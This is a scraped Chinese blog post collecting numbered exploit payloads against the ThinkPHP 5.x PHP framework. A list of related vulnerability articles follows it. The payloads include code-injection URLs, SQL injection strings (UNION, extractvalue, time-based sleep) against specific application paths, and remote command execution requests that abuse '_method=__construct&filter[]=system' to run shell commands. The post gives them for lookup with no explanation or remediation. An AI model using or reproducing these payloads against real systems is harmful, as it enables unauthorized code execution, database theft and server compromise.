整合了一个集合,方便查询

thinkphp 5.0.22

thinkphp 5

thinkphp 5.0.21

thinkphp 5.1.*

未知版本

16、?s=index/\think\module/action/param1/${@phpinfo()}

17、?s=index/\think\Module/Action/Param/${@phpinfo()}

18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}

19、index.php?s=/home/article/view_recent/name/1'

header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"

20、index.php?s=/home/shopcart/getPricetotal/tag/1%27

21、index.php?s=/home/shopcart/getpriceNum/id/1%27

22、index.php?s=/home/user/cut/id/1%27

23、index.php?s=/home/service/index/id/1%27

24、index.php?s=/home/pay/chongzhi/orderid/1%27

25、index.php?s=/home/pay/index/orderid/1%27

26、index.php?s=/home/order/complete/id/1%27

27、index.php?s=/home/order/complete/id/1%27

28、index.php?s=/home/order/detail/id/1%27

29、index.php?s=/home/order/cancel/id/1%27

30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+

31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1

Content-Disposition: form-data; name="couponid"

1') union select sleep('''+str(sleep_time)+''')#

thinkphp 5.0.23(完整版)debug模式

32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.0.23(完整版)

33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

thinkphp 5.0.10(完整版)

34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system

thinkphp 5.1.* 和 5.2.* 和 5.0.*

35、(post)public/index.php (data)c=exec&f=calc.exe&_method=filter

标签:index,http,vars,漏洞,thinkphp,php,集合,think

来源: https://www.cnblogs.com/whoami101/p/10958955.html

%3c php $str1=,thinkphp漏洞集合相关推荐

  1. thinkphp漏洞集合

    Thinkphp 5.0.22 http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username ...

  2. php %3c0x1a%3e是什么_利用ThinkPHP漏洞扫描攻击

    利用ThinkPHP漏洞扫描攻击 115.238.244.112   119.3.90.139    94.191.10.105 POST /index.php/?s=captcha HTTP/1.1 ...

  3. thinkphp漏洞复现

    所有文章,仅供安全研究与学习之用,后果自负! thinkphp漏洞 前言 一.thinkphp-2x-rce 代码执行 0x01 漏洞描述 0x02 影响版本 0x03 漏洞利用 0x04 漏洞修复 ...

  4. 【安全漏洞】Struts2漏洞集合总结

    Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充. 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用d ...

  5. 用友OA/NC/NCCloud漏洞集合

    目录 0x01声明 0x02漏洞集合 web.xml prop.xml(数据库配置) 任意文件读取 bsh.servlet.BshServlet 远程命令执行漏洞 用友 NCCloud FS 文件管理 ...

  6. thinkcmfx漏洞太大_thinkcmf漏洞集合

    thinkcmf漏洞集合 在先知逛的时候看到的的,后面发现是thinkcmf 翻了一下自己的漏洞库对比了一下版本发现,泡泡大佬这里看的是1.6版本的,而官方最后的版本 2.2.3 所以做一下漏洞补充. ...

  7. Struts2 漏洞集合

    Struts2 漏洞集合 总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充. 漏洞环境搭建可以使用在线的 Vulfocus ,或者使用d ...

  8. FineCMS 5 0 10漏洞集合

    分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow 也欢迎大家转载本篇文章.分享知识,造福人民,实现我们中华民族伟大复兴! 笔记地址 ...

  9. ThinkPHP漏洞总结复现

    ThinkPHP漏洞总结 简介 版本 Thinkphp 2.x 任意代码执行漏洞 漏洞原理 复现过程 修复意见 Thinkphp5-5.0.22/5.1.29远程执行代码漏洞 漏洞原理 影响范围 复现 ...

最新文章

  1. clientHeight , scrollHeight , offsetHeight之间的区别及兼容方案
  2. 【深度学习】图像数据集处理常用方法合集(部分基于pytorch)
  3. 八皇后问题 (递归 搜索)
  4. php小结,PHP编程小结
  5. 将CSDN600W用户及密码帐号存入本地MySql数据库
  6. MyEclipse/Eclipse 中使用javap
  7. python网页开发好用吗_推荐用于Web开发的最好 Python 框架
  8. jsp 嵌入java_关于JSP里的Java语句嵌入问题
  9. S5PV210裸机之外部中断
  10. java零碎要点013---java lambda 表达式中的双冒号的用法 ::
  11. 基于springboot的社区物业系统
  12. Nginx配置文档详解
  13. Xshell Xftp 免费版申请 官方正版 | 无需破解
  14. 使用NanoHttpd实现简易WebServer
  15. matlab igbt在哪,提出问题:“IGBT是什么?都在哪里有应用?”
  16. php识别二维码内容
  17. php qrcode二维码应用
  18. 薅羊毛php源码,薅羊毛软件-抢福袋源码分享
  19. [自动驾驶]高德的高精度地图
  20. Harbor docker login x509 certificate signed by unknown authority

热门文章

  1. 【Redis】redis如何保存对象
  2. Math之ARIMA:基于statsmodels库利用ARIMA算法对太阳黑子年数据(来自美国国家海洋和大气管理局)实现回归预测(ADF检验+LB检验+DW检验+ACF/PACF图)案例
  3. windows 10 开启远程控制流程
  4. mysql学习笔记---mysql的安装--rpm安装
  5. 亚马逊erp,亚马逊FBA系统,虾皮erp,仓储货代erp,跟卖ERP系统
  6. 手把手带你领略自动执行任务的快感
  7. 【调剂】哈尔滨工程大学 核学院 装置所 收调剂
  8. java 流压缩_java之IO流:压缩文件
  9. 苹果iPhone6现在手机多少钱价
  10. CASAIM高精度自动化三维扫描系统检测塑料件,自动检测形位公差